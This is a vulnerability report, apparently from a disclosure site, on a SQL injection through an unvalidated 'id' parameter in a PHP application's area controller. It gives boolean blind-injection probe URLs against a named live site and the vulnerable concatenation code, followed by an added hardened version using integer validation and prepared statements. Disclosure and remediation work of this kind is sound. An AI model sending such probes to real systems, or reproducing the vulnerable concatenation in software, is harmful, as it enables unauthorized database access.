### Brief description:

The `id` parameter is not coerced to a type, so a SQL injection exists.

### Detailed description:

In `\app\controller\area.class.php` the `id` parameter is not processed at all, so an injection exists:

```
public function getCitys() {
    $aeraObj = M("area");
    $provinceId = $_GET["id"]; // no processing of any kind
    return $aeraObj->getCitysByProvinceId($provinceId);
}
```

In `\app\model\areaAction.class.php` the value goes straight into the SQL:

```
public function getCitysByProvinceId($provinceId) {
    $type = $_GET['type'];
    // $provinceId is concatenated into the WHERE clause without processing
    $ary = $this->where("pid = " . $provinceId)->limit(1000)->find();
    return $ary;
}
```

### Proof of vulnerability:

Visiting http://www.teamcen.com/index.php?id=1&ac=area_getCitys displays normally.

Then http://www.teamcen.com/index.php?id=1 AND 1=1&ac=area_getCitys

![1=1.png](https://images.seebug.org/upload/201401/1323402565c151a9a447a9d8b69e9b1894d76dfd.png)

Then http://www.teamcen.com/index.php?id=1 AND 1=2&ac=area_getCitys

![1=2.png](https://images.seebug.org/upload/201401/132341064705121bc1aaedf2d009e45f03265f34.png)

In local testing it can be determined that the number of administrator accounts is 1:

![count=1.png](https://images.seebug.org/upload/201401/13234538e80634ca75be28f5eb8b018c775fb16c.png)

.... and various blind-injection checks.
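Added example (not code from the report or from the affected application): the vulnerable concatenation from the detailed description beside a hardened version that validates `id` at the controller boundary and passes it to the query as a bound integer rather than as SQL text. The ThinkPHP 3-style `where(array(...))` form is assumed from the report's own `M()`/`where()`/`find()` calls, and the PDO variant is an added assumption for code outside that framework.

```php
<?php
// Added example, not the application's code. Method names in the "framework"
// path (where/limit/find) follow the ThinkPHP 3 style seen in the report.

// Vulnerable pattern: the raw query-string value becomes part of the SQL text,
// so "1 AND 1=2" turns into an extra condition instead of an id.
function buildWhereVulnerable($provinceId) {
    return "pid = " . $provinceId;
}

// Hardened, step 1: coerce/validate at the controller boundary. Anything that is
// not a plain non-negative integer is rejected before a query is ever built.
function readProvinceId(array $get) {
    if (!isset($get['id']) || !ctype_digit((string)$get['id'])) {
        return null;
    }
    return (int)$get['id'];
}

// Hardened, step 2 (framework path): pass the id as data via the array form of
// where(), so the framework binds/escapes it; the int cast removes any doubt.
function getCitysByProvinceIdSafe($model, $provinceId) {
    return $model->where(array('pid' => (int)$provinceId))->limit(1000)->find();
}

// Hardened, step 2 (plain PDO path, assumed available): a prepared statement with
// a typed placeholder keeps the id out of the SQL string entirely.
function getCitysByProvinceIdPdo(PDO $db, $provinceId) {
    $stmt = $db->prepare('SELECT * FROM area WHERE pid = :pid LIMIT 1000');
    $stmt->bindValue(':pid', (int)$provinceId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: the report's probe value and a legitimate id.
$probe = array('id' => '1 AND 1=2');   // constructed, mirrors the proof-of-concept URL
$legit = array('id' => '1');           // constructed

// The vulnerable builder lets the whole probe string into the WHERE clause.
echo "vulnerable: " . buildWhereVulnerable($probe['id']) . PHP_EOL;
// The hardened reader rejects the probe (null) and accepts the legitimate id (int).
var_dump(readProvinceId($probe));
var_dump(readProvinceId($legit));
```

For detection, the same boundary check is the place to log rejected `id` values, since a value containing spaces or SQL keywords in a parameter that should only ever be an integer is a clear probe signal.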